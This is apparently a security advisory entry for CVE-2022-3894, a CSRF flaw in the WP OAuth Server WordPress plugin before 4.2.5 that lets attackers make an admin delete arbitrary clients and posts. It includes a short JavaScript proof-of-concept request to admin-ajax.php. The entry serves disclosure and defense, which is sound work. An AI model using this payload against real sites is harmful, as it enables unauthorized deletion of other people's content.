WP OAuth Server < 4.2.5 – Arbitrary Post Deletion via CSRF | CVE 2022-3894 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when deleting a client, and does not ensure that the object to be deleted is actually a client, which could allow attackers to make a logged in admin delete arbitrary client and post via a CSRF attack.

Proof of Concept

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wo_remove_client&data=1',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

oauth2-provider

Fixed in 4.2.5

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

298487b2-4141-4c9f-9bb2-e1450aefc1a8

Timeline

Publicly Published

2023-02-21 (about 2 years ago)

Added

2023-02-21 (about 2 years ago)

Last Updated

2023-02-21 (about 2 years ago)

Other

Published

Title

Published

2025-04-09

Title

Foliopress WYSIWYG <= 2.6.18 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2023-02-28

Title

WP Social Bookmarking Light <= 2.0.7 - Cross-Site Request Forgery (CSRF)

Published

2023-12-27

Title

Inline Image Upload for BBPress < 1.1.19 - Cross-Site Request Forgery via hm_bbpui_admin_page

Published

2022-05-09

Title

Bulk Page Creator < 1.1.4 - Arbitrary Page Creation via CSRF

Published

2021-04-16

Title

Edwiser Bridge < 2.0.7 - CSRF Nonce Bypass